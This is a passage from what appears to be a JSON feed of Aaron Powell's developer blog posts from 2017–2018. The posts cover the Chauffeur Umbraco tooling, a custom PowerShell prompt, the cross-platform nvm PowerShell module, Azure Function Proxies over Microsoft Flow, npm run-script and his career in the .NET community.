"https://www.aaron-powell.com/posts/2018-02-23-managing-packages-with-chauffeur/", "date": "Fri, 23 Feb 2018 14:43:05 +1000", "tags": [ "chauffeur", "umbraco" ], "description": "Searching and installing packages from the Umbraco feed with Chauffeur", "content": "Something that I’m really proud of with Chauffeur is how easy it is to extend, and I do a lot of little experiments to validate that the extensibility.\nLast year I was working on some Umbraco stuff and needed to install a package from the Umbraco package feed. Now normally I’d want to use NuGet to manage my external dependencies but with Umbraco you might require something that isn’t really a .NET distributable, it’s something that modifies Umbraco itself.\nNow this poses an issue for me with Chauffeur, I want to script everything, but installing a package from the package feed is a very manual process. So I decided to look into whether I could do it from Chauffeur.\nToday on the back of the Chauffeur 1.0 release I released v1.0 of Chauffeur.ExternalPackages!\nHere’s the plugin running, I’m searching for a PDF package, then downloading it and finally unpacking it (basically unzipping the archive).\nWhile the search is useful it’s more designed to be used with a delivery that scripts the download, unpack and eventual install. Here’s an example of installing the default starter kit:\nexternal-package starter-kit ced954d1-8c0f-4abe-bdda-99e7a787d052 external-package unpack ced954d1-8c0f-4abe-bdda-99e7a787d052 pkg package -f:$ChauffeurPath$\\ced954d1-8c0f-4abe-bdda-99e7a787d052-unpack external-package actions ced954d1-8c0f-4abe-bdda-99e7a787d052-unpack\\package.xml Let’s break it down:\nInstall a starter kit by the ID of it (you can find that by using external-package starter-kit) Unpacking the package based on its ID Using the “core” package deliverable to install it, but we’re using the -f flag to override the lookup path (since the zip is unpacked into a nested location) Running the package actions that are provided And there you have it, now you can easily install a package from the Umbraco package feed and run its package actions using Chauffeur!\n", "id": "2018-02-23-managing-packages-with-chauffeur" }, { "title": "Chauffeur goes v1", "url": "https://www.aaron-powell.com/posts/2018-02-23-chauffeur-goes-v1/", "date": "Fri, 23 Feb 2018 14:27:51 +1000", "tags": [ "chauffeur", "umbraco" ], "description": "After a long time Chauffeur v1.0 is out", "content": "🎉 TL;DR Chauffeur is finally at version 1.0, time to get updating! 🎉\n3 years and 11 months a go I initialised a git repo for what would become Chauffeur (the first actual code was not much later that day). Over the time I’ve chipped away at it slowly, added features, fixed bugs, etc.\nFor a while it’s been pretty stable, it did pretty much what I was wanting it to do, so really the only thing missing was the fact that it wasn’t a “v1 product”.\nWell today to celebrate the first Australian Umbraco festival, where I spoke about Chauffeur, I decided it was time to bite the bullet and call it v1.\nThe one big thing that I did add for the new release was a proper documentation website where I cover off getting started and different Deliverables that ship in the box.\nNext for Chauffeur is starting to work on some new features to make it even easier to get started and create incremental steps.\nHappy automating!\n", "id": "2018-02-23-chauffeur-goes-v1" }, { "title": "The Happy PowerShell Prompt", "url": "https://www.aaron-powell.com/posts/2018-01-30-the-happy-powershell-prompt/", "date": "Tue, 30 Jan 2018 13:40:38 +1100", "tags": [ "powershell", "random" ], "description": "Some fun with customising your PowerShell prompt.", "content": "Recently, for no particularly good reason, I decided to mess around with my PowerShell prompt and create what I’m dubbing the Happy PowerShell Prompt.\nDid you know that you can customise the PowerShell prompt like that? Well it turns out that it’s actually quite easy, PowerShell has a bunch of built in functions that you can override to change the operation, one such function is function:\\prompt, and overriding this will override your prompt!\nFirst off, before we pull anything apart maybe we should look at what we’re currently seeing, easiest way to do this is with Get-Content:\n1 PS C:\\> Get-Content function:\\prompt This should return you something like so:\n"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "; # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml Now the top line is obviously the important stuff, that’s how your prompt works. You’ll see it’s an interpolated string that contains PS followed by the current path and the number of nested PowerShell sessions you’re in (to be honest I didn’t know what it was until I started reading about Host.EnterNestedPrompt) which I won’t go into here.\nOk, well now we can start futzing with it:\n1 2 PS C:\\> $prompt = { "Aaron Rocks $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) " } PS C:\\> Set-Item -Path function:\\prompt -Value $prompt First you need to define a script blog that contains your new prompt value, and then we use the Set-Item to set the value of function:\\prompt.\nTa-da! You’ve now got yourself a prompt that tells you something important, that I rock!\nBut unfortunately that will only work for the current PowerShell session, and we want something persistent. Time to crack open your PowerShell profile. First thing you need to do is find out if you have a PowerShell profile:\n1 2 3 4 5 Aaron Rocks C:\\> Test-Path $profile False Aaron Rocks C:\\> New-Item -Path $profile -ItemType File -Force Aaron Rocks C:\\> $profile C:\\Users\\ContainerAdministrator\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1 So here I find that the profile didn’t exist so we created a new one which lives in your %USERPROFILE%\\Documents\\WindowsPowerShell folder (I’m doing it inside a Docker container, because, why not 😛).\nNow grab your code from above, paste it in and launch a new PowerShell session, your profile is applied and you’ll always see that I rock!\nMaking a happy prompt Ok, so maybe a prompt telling you that Aaron Rocks isn’t going to work for everyone, let’s have a look at how to create the Happy PowerShell Prompt from above.\nFor it I have 3 things happening:\nI show the current path I show the git repo status, if I’m in a folder with a git repo Show something positive Well we know how to get the current path, that’s easy, how about the git info? For that I’m using the excellent Posh-Git module, which if you’re using git on Windows and not using Posh-Git, you’re missing out. Posh-Git in fact will want to modify your prompt for you anyway, but unfortunately it doesn’t play well with what I’m going to do, so instead I’m going to manually invoke it.\nFirst things first I need to know if I’m in a git repo on disk, to do that I’ll just make the assumption that if there’s a .git repo in the current folder, or any of its parents, I’m in a git repo. For that I’m going to create 2 functions, one that imports Posh-Git, and one that checks for a .git folder:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $gitLoaded = $false function Import-Git($Loaded){ if($Loaded) { return } Import-Module Posh-Git > $null return $true } function IsGitRepo($Path) { if (Test-Path -Path (Join-Path $Path '.git') ) { $gitLoaded = Import-Git $gitLoaded Write-VcsStatus return } $SplitPath = split-path $path if ($SplitPath) { IsGitRepo($SplitPath) } } I’m also tracking a variable of whether I loaded Posh-Git already so I don’t load it multiple times. Now you’ll notice inside the IsGitRepo function I call Write-VscStatus. This is a function provided by Posh-Get and it’ll output the status like you see in my path above at the current location, so all good, we’re getting our git status!\nFinally I’m going to create an array of curated happy emoji, use the Get-Random PowerShell function to select one and then append it to my prompt. Here’s how it all looks:\n1 2 3 4 5 6 7 8 9 10 11 12 13 [ScriptBlock]$Prompt = { $host.UI.RawUI.WindowTitle = Microsoft.PowerShell.Management\\Split-Path $pwd.ProviderPath -Leaf $Host.UI.RawUI.ForegroundColor = "White" Microsoft.PowerShell.Utility\\Write-Host $pwd.ProviderPath -NoNewLine -ForegroundColor Green checkGit($pwd.ProviderPath) $happyPrompts = @('🍺'; '😀'; '🤜'; '🎉'; '🤟'; '✔'; '👌'; '🌈'; '❤'; '💯'; '🆗'; '🗨';) $prompt = $happyPrompts[(Get-Random -min 0 -max ($happyPrompts.Length))] Microsoft.PowerShell.Utility\\Write-Host "`n$prompt " -NoNewLine -ForegroundColor "DarkGray" return " " } Set-Item -Path function:\\prompt -Value $Prompt -Options ReadOnly To get the line break I’m inserting a `n before the emoji.\nAnd there you have it, your very own happy prompt.\nA word of caution - if you make your prompt too complex and run commands in it you can slow down your shell, remember this executes each time. Also, be careful you don’t break exit codes 😉.\n", "id": "2018-01-30-the-happy-powershell-prompt" }, { "title": "Learn About Umbraco Continuous Delivery at uduf", "url": "https://www.aaron-powell.com/posts/2018-01-21-learn-about-umbraco-cd-at-uduf/", "date": "Sun, 21 Jan 2018 13:18:25 +1100", "tags": [ "umbraco", "chauffeur", "speaking" ], "description": "An overview of my upcoming talk at Umbraco Down Under Festival", "content": "Have you heard, there’s an Umbraco conference coming to Australia, Umbraco Down Under Festival, aka uduf! I’m really excited for this, I’ve been wanting to see more Umbraco community events happening in Australia, so to see a fully-fledged conference happening is damn cool.\nI’m also excited to be speaking at this inaugural event, and speaking about an aspect of Umbraco that I’m very passionate about, how you do continuous delivery.\nWhat can you expect in the talk? For this talk I’m going to look back at how we deploy Umbraco solutions and talk about some of the approaches that I’ve used over the years I’ve worked with Umbraco, to frame the context of why it’s a hard problem to solve.\nI’m then going to look at how we can deploy Umbraco projects in an automated fashion. I’ll look at a couple of techniques, the pros and cons of each of them in an attempt to ensure that the audience is informed about what approach will work best for their organisation.\nNaturally I’ll talk about Chauffeur and I’ve got some cool stuff around Chauffeur that I’ll unveil at the event.\nCan’t wait to see you there!\n", "id": "2018-01-21-learn-about-umbraco-cd-at-uduf" }, { "title": "On blogging and content ownership", "url": "https://www.aaron-powell.com/posts/2018-01-15-blogging-and-content-ownership/", "date": "Mon, 15 Jan 2018 16:43:07 +1100", "tags": [ "random" ], "description": "My thoughts about getting into blogging and how to manage your content", "content": "Recently the question came up within Readify about how to get into blogging. As someone who blogs (obviously) and has blogged for a while now, I decided to share my thoughts on the topic. In fact it’s a question that I’ve been asked a few times, I’d been considering writing a post about it and someone suggested that I do it, so it’s time for a meta post on blogging on my blog.\nWhy blog? Plenty of people have written blog posts about why it is important for your career to have a blog, how it’ll give you a leg up in the job market, etc. but in my opinion most of this is a load of rubbish. All of this focuses the conversation in the wrong way, what can you push out to everyone else, not what can you do for you.\nSee for me, blogging is about writing down something that I want to write down, not what others want me to write down, and that’s why on this blog you’ll see everything from JavaScript to Docker, things that you can use it production to things you really shouldn’t use in production (or, maybe anywhere!).\nIf you write something because you want to write it and you enjoyed writing it, then who’s to say it wasn’t valuable? You’re not measured by the number of page views in Google Analytics, the number of retweets the post gets or anything thing other than “did I have fun?”.\nWhat do I blog about? Admittedly, this is pretty intertwined with the pervious point, but don’t feel like you need to have a theme to your blog. I originally did start that way, hence the name LINQ to Fail, a lot of my early work was in LINQ and looking at how to do things with it, but the risk of a theme is cornering yourself in where the blog will go. It’s nearly a decade since I started blogging and if I was still trying to focus on LINQ there’d be a heck of a lot less posts 😛.\nAnd your career with grow and evolve, what I was doing 10 years ago is very different to what I’m doing now, so again that feeds into the over time evolution of your blog.\nNow sure, you don’t want a huge swing post-to-post of what you’re blogging about, having trends is a good idea. My blog is heavily swayed in the JavaScript and Umbraco space, but I’ll still blog about Docker if that’s something that’s taking my fancy at the time.\nWhat platform should I use? opens can of worms and waits\nOk, so this is something that everyone will have a different opinion on, so feel free to skip!\nTL;DR Markdown files in a git repo with a static site generator like Jekyll, Hugo, etc.\nLong form answer\nLike I said, I’ve been blogging for almost 10 years, but I’m not 100% sure when I started (and I’ll get to that shortly).\nWhen I started I created a website in Umbraco, wrote some C# Web Service and cobbled together some JavaScript to call them so that I could make a cool AJAX-y site. This was hosted on a webserver at the company I worked, with the database running on one of their SQL Servers.\nI’d occasionally open up the codebase on my laptop (it wasn’t in source control!) and edit the code, I broke the comments engine for a while doing this, and then copy the files to production.\nI realised how terrible this was for SEO I rewrote the ASPX pages, showed the latest posts on the home page and I think chucked in a bunch of <UpdatePanel>’s to keep up the awesome AJAX.\nWhen I moved to Sydney I took my website with me, I backed up the SQL database, copied the files via FTP and then put them onto my new companies servers.\nAfter a while of rewriting the page templates I decided to move off Umbraco and into a dedicated blog engine that Paul Stovell had written, and we’d eventually open source as FunnelWeb. Now guess what, I needed to write a content migrator to get the content from Umbraco and into FunnelWeb, and from HTML to Markdown (ok, I didn’t actually do that, I just dumped HTML in the Markdown).\nAnd thus the first of three migration engines I’ve written started.\nI also decided it was time to stop mooching off my company and pay for hosting (also, I’d moved to Readify who didn’t have a webserver I could use 😛), so I found a company I liked and put it on their web/SQL Server (this was pre-cloud days, no Azure for me).\nAnd this worked for a while for me, but I started to hit a problem, I wanted to write posts offline, something you can’t do with an online-only editing experience.\nThis was when I first decided to move to a static site generator, so I wrote a migrator to convert the SQL-stored content into flat Markdown files, picked a Node.js-based static site generator, picked a template and got going (I also moved hosting, no need to pay for a SQL DB anymore!).\nUnfortunately I made a poor decision in the static site generator I chose to use, and it was pre-yarn days so I would clone onto a new machine, npm install only to find everything broken again. This caused my blogging to suffer, the constant maintenance I needed to just get the site running to preview a post meant I was less inclined to post.\nAnd thus began the last of my great migrations, this time to a different static site generator. This time I picked one that had a bigger community but more importantly it has no external dependencies (seriously, the binary for Hugo is in my git repo!) so I can clone and run locally with no effort.\nIt’s your content, it’s your responsibility This is something that it took me a long time to learn, and I learnt it the hard way. Over the years of using a hosted platform, not a SaaS platform but something akin to hosting WordPress yourself, is that you are responsible for owning that content. Sure you’ve got SLA’s in place around the DB being backed up, but have you tested it? What happens if your hosts DB server dies? What happens if something gets corrupted in the DB? Can you get your content back?\nI learnt this the hard way. I can tell you that I started blogging approximately 10 years ago. I know I published a post on the 6th June 2008, but I don’t think that’s my first blog post, but I don’t know for certain. Late last year while going through some old OSS projects I stumbled on a link to a post on my website that 404’ed. Now this wasn’t surprising, I’ve changed URL schemes many times, but I couldn’t find a blog of that title anywhere in my repo. Then I started looking at the time stamps on my posts, there were some huge gaps, gaps that didn’t make sense.\nAnd this is where I found out that I was missing a lot of my early content. In fact I was missing pretty much all content from 2008 and the first half of 2009!\nSo I had a mild freak-out, I didn’t have DB backups anywhere and it’s not like I have the DB on these hosts anymore (if they even exist!), so how was I going to recover this lost content? Well thankfully a bit of poking around in wayback machine I was able to find a bunch of the old posts (~70) that I didn’t previously have.\nStatic sites ftw Throughout this process I’ve come to realise that a static site is just the best way to go about managing your content. This puts you in the control, how it’s published, where it’s published, how you manage the workflow of draft -> release, all that stuff.\nSaaS platforms come and go, and the last thing you want to be doing is trying to pull your content before somewhere is shutdown.\nAnother advantage of a static site is that you aren’t just restricted to it being a blog, I can easily host things like demo code for articles, or just things I want to play around with.\nMonetisation While I’m on the train of dissing the way people blog I’m going to talk about ads on blogs. You can run an Azure AppService for ~$10 per month (Basic), which is nothing, or you can run it free easily on places like Heroku or even out of an S3 bucket. So the idea of monetising just seems silly. Maybe when I get to the traffic levels of someone like Scott Hanselman or Troy Hunt I might think differently, but really, invest in yourself. And anyway, most people have ad-blockers on these days so is it really going to do much?\nConclusion So this post was a bit musing, bit ranting, but mostly some of my thoughts on how and why I blog.\n", "id": "2018-01-15-blogging-and-content-ownership" }, { "title": "2017 - A year in review", "url": "https://www.aaron-powell.com/posts/2018-01-11-2017-a-year-in-review/", "date": "Thu, 11 Jan 2018 09:25:41 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Another year has come and gone and with that it’s time for everyone to write there ‘The year that was’ posts. I missed doing it in 2016 but though that for 2017 I’d do one as it was an interesting year for me.\nA quick look at my blog history shows that I did a total of 21 posts in 2017, which is not bad given that I didn’t start blogging again until I rebuilt my site in July!\nThis does mean that I didn’t really talk about the first half of the year much, and who knows what happened then! Well one thing that happened was my first trip to NDC London to present my Redux, beyond React and The Beauty of Stupid Ideas talks. The other was working on a very large program of work for a multinational organisation that saw me spending a lot of time in meetings at all hours of the day.\n2017 also saw me get deeper into the PC role I was promoted to in 2016 at Readify but then during the later half of the year I shifted across to the sales team to broaden my skills across the business.\nI spent more time in React, partially because we were using it on this large project and partially because I enjoyed it. One question I was pondering was how to best use SVG’s with React which led to these two posts that show how easy animating SVG’s with React can be.\nI continued my involvement with DDD Sydney, joined the agenda committee for NDC Sydney (and spoke there too) and of course headed down for DDD Melbourne.\nThe other bit of tech that I plated around with, and used to indulge my stupid ideas, was Docker. I gave a talk called Docker, FROM scratch at DDD Melbourne and NDC Sydney that I’m quite proud of (and have received very positive feedback on), and I then looked at really crazy uses of Docker like running VS Code on Linux from WSL from Windows 10 which may not be useful to anyone unless you have to debug PowerShell on Linux.\nOpen Source was a big part of the latter half of the year, with a major update to my PowerShell node version manager and Chauffeur getting more love. Expect to see more on Chauffeur this year, I’ve been working on some nifty stuff with it for the upcoming Umbraco Down Under Festival.\nAnd that’s pretty much a wrap for another 12 months!\n", "id": "2018-01-11-2017-a-year-in-review" }, { "title": "PowerShell nvm v2", "url": "https://www.aaron-powell.com/posts/2017-12-07-powershell-nvm-v2/", "date": "Fri, 08 Dec 2017 15:19:23 +1100", "tags": [ "node.js", "powershell" ], "description": "Introducing PowerShell nvm v2, a cross-platform Node.js version manager", "content": "🎉 TL;DR PowerShell Node Version Manager is 2.0 with semver support, autocomplete and it works on Windows, OSX and Linux PowerShell releases! 🎉\nA little over 3 years ago I was annoyed that I couldn’t easily run multiple versions of Node.js on Windows and that meant I could either install the stable version my project needed or install a bleeding edge version, I couldn’t easily do both. I knew that Linux/OSX had nvm but I was on Windows and short of using Cygwin shudders I didn’t have any options. So I set about writing a PowerShell script to help me out (not a batch script, it’s 2014 not 1990), which I then turned into a PowerShell module.\nOver the years I added to it as I needed new things, like adding io.js support, back in the days of the great Node.js stagnation, added distribution via the PowerShell Gallery and added an alternative install location to $PSScriptRoot to deal with long paths.\nThen a few months ago Felix Becker created an issue Error on macOS, about the fact that the module didn’t work on PowerShell on OSX. Well, ok then, I’d never actually tried it on OSX (I don’t have a current mac), so I left it to Felix to send a PR if he wanted to try and fix it.\nAnd this started a flurry of work on ps-nvm! While the OSX shipped in the 1.5.1 release it was a little flaky, but it worked, Felix raised a bunch more things that would be great to get in there like tests, support for the package.json engines value, semver install support (being able to install with >7.0.0) and proper CI/CD.\nTesting I got cracking on writing tests with Pester, where I introduced a combination of unit and integration tests that look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 It "Gets known versions" { $tmpDir = [system.io.path]::GetTempPath() Mock Get-NodeInstallLocation { Join-Path $tmpDir '.nvm\\settings.json' } Mock Test-Path { return $true } Mock Get-ChildItem { $ret = @() $ret += @{ Name = 'v8.9.0' } $ret += @{ Name = 'v9.0.0' } return $ret } $versions = Get-NodeVersions $versions.Count | Should -Be 2 $versions | Should -Be @('v9.0.0'; 'v8.9.0') } This generates a mock of a couple of PowerShell commands (so we don’t actually hit the disk) to check that we get a couple of versions found. All the tests can be found in nvm.tests.ps1.\nDoing this though I learnt a couple of things with Pester for cross-platform testing. When running on non-Windows platforms we had a bunch of problems with the temp directory that Pester creates so instead we just used [System.IO.Path]::GetTempPath() and managed it ourselves. Also the way the mock directory is cleaned is a bit of a pain so you have to do a bunch of stuff with the before/after test run functions.\nBut we got it all up and running, we have CI so that we can check across Windows, OSX and Linux. We also now do code coverage reporting (and have 89% coverage at the time of 2.0.0)!\nGoing cross-platform So this all started with Felix kicked all of this off wanting OSX support, but once that was in there it got me thinking about why I don’t also expand it to cover Linux. The hard yards were done getting xplat working, so just a bit of a push to have the branch for Linux support would be easy.\nWell the first thing you need to do is reliably work out what OS you’re on, and, well, that’s a bit more of a pain. Normally I’d just do $env:OS and check that, but unfortunately in PowerShell Core (the xplat release) that doesn’t exist!\nBut, if you’re on PowerShell core you get 3 global variables introduced, $IsLinux, $IsMacOs and $IsWindows. Great, we can use that… oh but now I have a Windows issue, you would have to be using PowerShell Core, but that’s in preview, so people are unlikely to want that as their primary PowerShell version.\nAlso, if you’re running in strict PowerShell mode like I do when you try and access a global variable that hasn’t been defined your script will error out.\nNow we’re back to the drawing board, I need to:\nCheck which OS you’re on in a cross platform, cross PowerShell version way Can’t rely on magic global variables without relaxing my rules A bit of googling around told me that you can exploit Test-Path to check if variables are defined but doing Test-Path variable:global:variable-name, so that lead me to create some helper functions:\n1 2 3 4 5 6 7 function IsMac() { return (Test-Path variable:global:IsMacOS) -and $IsMacOS } function IsLinux() { return (Test-Path variable:global:IsLinux) -and $IsLinux } That’s great for PowerShell Core, but what about PowerShell 5? Well here we have to be a little trickier and use the $PSVersionTable as well:\n1 2 3 4 5 6 7 8 9 function IsWindows() { if ($PSVersionTable.PSVersion.Major -lt 6) { # PowerShell less than v6 didn't work on anything other than Windows # This means we can shortcut out here return $true; } return (Test-Path variable:global:IsWindows) -and $IsWindows } Now within our module we can do if (IsMac) { ... simply!\nSo a bit of branching logic with that and we can download a Linux package as well, then unpack the tar file and you’re good to go!\nSemVer support This is a pretty cool feature and something that I’d seen some requests for in the past. Basically you might want to depend on a range of node.js versions and now nvm can install from that range for you:\nPS> Install-NodeVersion '>=5.0.0 <7.0.0' With this nvm will work out what is the highest available Node.js version that you can install, and install it. SemVer also works for the Set-NodeVersion so if you have lots of local installs you can get the best fit for your current use case.\nTo achieve this we decided against writing it from scratch in PowerShell but instead depending on a NuGet package called SemanticVersioning which allows you to generate ranges and test versions within ranges.\nBecause I don’t like committing binary files to source control we then had to find a way to get that package installed and loaded into the PowerShell host. All in a xplat way! Well thanks to netstandard 2.0 that should be easy right? Yeah… nah. Due to a bug in .NET we have to have a hard dependency on .NET 4.7.1 (or you have to do a bunch of futzing with .NET locally).\nYou will need to have .NET Core 2.0 installed and .NET 4.7.1 for the easiest usage. That is our supported scenario.\nAutocomplete This is something I’m really excited about, you now get tab completion of the installed versions of Node.js in your machine when you use Set-NodeVersion and Remove-NodeVersion:\nI don’t quite get how it all works, other than you override some magic functions in PowerShell, but you can see its implementation here. What I find fun is that it’s circular, the autocomplete actually uses nvm to do its own autocomplete!\nThat’s a wrap This has been a lot of fun, I will admit that it’s probably the most complex process behind a PowerShell module that you can think of, 3 separate builds, 3 OS’s, lots of test coverage, etc. but as a result of that I’ve learnt quite a lot more about how to approach well designed PowerShell, maintainable PowerShell, how you can do testing, verification, multiple version support and a bunch of stuff like that.\nI hope the code can act as a reference point for others to learn about how to do this as well.\nNow go out and install v2!\n", "id": "2017-12-07-powershell-nvm-v2" }, { "title": "Simple APIs With Microsoft Flow And Azure Functions", "url": "https://www.aaron-powell.com/posts/2017-11-17-simple-apis-with-flow-and-azure-functions/", "date": "Fri, 17 Nov 2017 10:04:08 +1100", "tags": [ "flow", "serverless", "azure-functions" ], "description": "How to use Microsoft Flow and Azure Functions to create simple demo APIs", "content": "When I’m working on demos for a blog post/talk/OSS project/etc. I will tend to just create an ASP.NET Core app or Node.js app and throw it somewhere for hosting. But it’s always a little tedious, no matter how many times I do it it requires me to dig up my old boilerplate code and then put it somewhere.\nRecently I was wanting to create a PoC but I wanted to have data persistence to it, I don’t really care how I persist the data, just it needs persisting. Standing up an Azure SQL instance was overkill, it’s a PoC so I’m likely to have a dozen records in it. Ok, well I guess I can just write it to a file on disk, but that’s not really great as an AppService, next deployment will just kill it, so I thought why not use an Azure Table.\nWell that’s easy enough, but there’s a bunch of code I’d need to write to get it all working when really I just want to send some values and store them to retrieve from another API call.\nWell this is really a lot of work for something that is a very minor part of the problem I’m trying to solve, and I feel like there’s a bunch of shawn yaks around in my future…\nEnter Microsoft Flow I’ve been playing with Microsoft Flow for a while, it’s a nice way to do automation, it’s similar to IFTTT but integrates nicely with O365 and other MS services. One Connectors of Flow that I like is the HTTP connection which created a HTTP endpoint that you can use to invoke your Flow!\nSo this sounds like a neat starting point isn’t it? I can create a Flow that is a HTTP endpoint and then there’s an Azure Table Storage connector that can write to or read from Table Storage.\nWell then, this looks nice and easy doesn’t it!\nBut there’s a few downsides to using Flow as a HTTP endpoint though, one is the URL that’s generated, it looks something like this:\nhttps://prod-21.australiasoutheast.logic.azure.com/workflows/77d8f1dfb5304131918db56d667b6bd8/triggers/manual/paths/invoke/api/task?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=HRN8KhwMbox9fbsGXJRG9y-As4VQkMilRgMe2NbqQ2A Yeah that’s not particularly simple a URL to use. The other problem is that if you’re building anything CRUD you’re going to have a bunch of different URLs that you have to use, as each Flow will have a unique URL (sure, you could get around this by having the Flow accept many different HTTP methods and then branch internally based on what it was, but that would make the Flow complex).\nEnter Azure Function Proxies Azure Functions is Microsoft’s entry in the Serverless architecture and it has a neat feature of it call Function Proxies.\nFunction Proxies are exactly what they sound like, a proxy to another endpoint (or you can use it to mock an endpoint). Now you can probably see where I’m going with this, creating a proxy to wrap the Flow URL with a proxy!\nThis now gives me a nice friendly URL from the Azure Function, I can define a route template (eg: /api/tasks) to hang off the hostname I get from the Azure Functions.\nNow I’m able hide my Flow URLs be something that’s easy to consume from my application, and if my PoC was to become a real application I can just swap out the Flow URL in the Proxies to either be another AppService or to be Azure Functions.\nConclusion It’s pretty easy to use create an Azure Function Proxy that will wrap around your ugly URL’s for testing. I used Flow for this but you could also use Logic Apps, which are the same infrastructure as Flow but they are part of the Azure Portal (rather than a separate service) and have easier integration with a CI/CD pipeline, or the Azure CLI.\n", "id": "2017-11-17-simple-apis-with-flow-and-azure-functions" }, { "title": "Debugging PowerShell from VS Code on Linux using Docker containers", "url": "https://www.aaron-powell.com/posts/2017-11-13-debugging-powershell-from-vscode-on-linux/", "date": "Mon, 13 Nov 2017 17:08:45 +1100", "tags": [ "linux", "docker" ], "description": "A valid(?) use case for using a Docker Linux container to run a GUI application on Windows", "content": "I’ve previously blogged about running a Docker Linux container on Windows to run VS Code on Linux and at the time I was really just doing it because I wanted to work out if it was actually possible, which it was! But in reality it was really a solution just looking for a problem.\nWell, good news, I have found the problem that this is a valid solution for! Well, as valid a solution as I can come up with at least.\nOne of my pet projects is a PowerShell module for managing different Node.js versions, called nvm. This little module has been floating around for a few years now, I add things to it whenever I find a problem, or someone reports one.\nThe other month someone raised an issue, the module didn’t work on OSX. Well I wasn’t surprised, I’d never tried it on OSX but Felix was willing to give it a go. After a bit of back and forth it was all up and running. We then worked on a few other steps that saw automated tests written and CI setup on AppVeyor and Travis-CI.\nAnd then what’s next, well adding Linux support of course! It’s being tracked here. There was a problem though, an error is reported when running the tests, an odd error about version numbers. I figured that the error was coming something in the test framework but I don’t know where so I needed to do some investigation.\nBut how do you do that when a) PowerShell is running on Linux and b) I don’t run Linux?\nDocker!\nSo I know you can run PowerShell in a Linux container and I previously proved I could run VS Code on a Linux container with X11 forwarding to Windows, so why don’t we combine them, install the PowerShell VS Code extension and debug the tests! It beats trying to work out how to setup remote debugging.\nIt was just a matter of taking Jessie’s VS Code Dockerfile, changing the FROM to be from microsoft/powershell and then you’re good to go!\nAww yeah! 😀\nFor the record I did find the cause of the bug, it was a type conversion issue due to the order of precedence in PowerShell equality tests within Pester, as reported here. Good to know JavaScript isn’t the only one with type conversion issues 😛\n", "id": "2017-11-13-debugging-powershell-from-vscode-on-linux" }, { "title": "Avoiding npm globals through run-script", "url": "https://www.aaron-powell.com/posts/2017-11-12-avoiding-npm-globals-through-run-scripts/", "date": "Sun, 12 Nov 2017 14:55:46 +1100", "tags": [ "nodejs", "npm" ], "description": "How to remove your reliance on globally installed node tools", "content": "I was talking with Richard Banks the other day about doing silly things with Docker (because, well I’m known for that at work) and he was saying he wants to create docker containers that contain the global npm modules that he often uses to save installing them using npm install -g.\nI asked him why he was using npm install -g and he said it was for build tools (gulp/grunt/webpack/etc.) so that you can easily run them.\nThis led me to show him how I use globals without relying on global installs.\nInstalling node cli tools When you use npm install -g it really doesn’t do anything different other than instead of putting the module in your $PWD/node_modules it puts them in the path that node.js is installed to, which (assuming you installed it correctly, or used nvm) will be in your $env:PATH (or other OS equivalent), thus making the command globally available. If you drop the -g then you still get the executable, but it’s in $PWD/node_modules/.bin.\nThis means that your local install can still be used, it’s just a pain to type the path every time before you run it.\nSo realistically you probably do want to be doing a local install because by doing so you have it added to your package.json and that makes it clear that you depend on webpack. It also means that you can state the version you depend on. By relying on globals you have to deal with the problem of what happens if you require webpack@3 but another project you work on is using webpack@1? Well one of them has a broken dependency if you use the global install, and thus it may not work properly.\nIntroducing npm run-script Our main pain point is with the additional path that has to be typed to get to our local installed version, so how do we get around this? Conveniently npm has something we can leverage run-script which allows you to define a command that can be executed, so we can now do this:\n$> npm run webpack To do this you need to add a scripts section to your package.json like so:\n... "scripts": {"webpack": "webpack"} ... But wait, how does it know which version of webpack to run? Isn’t that just looking for a global command?\nActually, no. When a run-script is executed npm will append the path of npm bin to the PATH your scripts environment, and thus it finds your local installed dependency.\nToo easy! 😀\nUpdate It seems that this isn’t the only way to do it:\nAlso see https://t.co/4EPsb0ZbUH, which is installed with npm by default\n— Tim Oxley (@timkevinoxley) November 12, 2017 Thanks Tim, TIL!\n", "id": "2017-11-12-avoiding-npm-globals-through-run-scripts" }, { "title": "Hit Refresh", "url": "https://www.aaron-powell.com/posts/2017-10-31-hit-refresh/", "date": "Tue, 31 Oct 2017 21:10:44 +1100", "tags": [ "career" ], "description": "My story of when I 'Hit Refresh' on my career.", "content": "I’ve started having a read of Hit Refresh and it got me pondering my own story.\nLike all good stories this one starts with heartache, I’d just gotten out of a long-term relationship and I was looking for an escape. Drug, alcohol, none of those appealed, instead I escaped into the world of open source software.\nWell this was 2009 and I was a .NET developer and open source was not really a thing in the .NET community, after all .NET Core was 6 years away and there was no NuGet.\nI got involved in the Umbraco community, Umbraco being a .NET CMS that we used at work and one of the few OSS projects that I was aware of. I had dabbled a bit with it before, had published my own OSS library for use with Umbraco, but this time I decided to get more involved.\nThrough this involvement I got invited to be a contributor to the project and was invited to their annual conference in Copenhagen. I’d never been to a user group or conference in Australia, let alone an international conference, but I couldn’t pass up the opportunity. So I organised my leave from work, booked my flight and prepared to deal with the anxiety of going so far out of my comfort zone and headed over.\nBut I had a secret objective, to find a new job. I was still a bit raw (it’d only been a few months) and I thought “hey, I could work in Europe for a few years”. Well I did meet someone over there, they happened to be the only other Australian, who hailed from a company in Sydney.\nA few weeks after returning from Copenhagen I was packing my apartment up and moving to Sydney!\nNow though I was bitten by the community bug, I’d had such a blast getting into OSS and attending a conference I started getting into the Australian dev community. I started following people in Sydney on twitter (many of who are now close friends) and saw them talking about an upcoming Australia conference called DDD Melbourne. One night after a few glasses of liquid courage I decided to submit, I’d seen people present and was sure I could do it too.\nAfter a couple of weeks, I got an email saying I’d been accepted to speak, then I’m on stage in front of a bunch of people and meeting all these people I looked up to in the Australian dev community!\nAnd i was hooked. I started attending, then speaking at User Groups, then bigger conferences like TechEd, and eventually running DDD Sydney. This got me on the radar of Readify, I was encouraged to join (where I’ve been for 7 years now) and eventually lead to me being awarded my first Microsoft MVP award.\nLooking back it’s all very surreal, what started as a whim decision to head to an event on the other side of the world opened up a whole new world for me. I was nervous getting on that first plane, I was nervous writing that 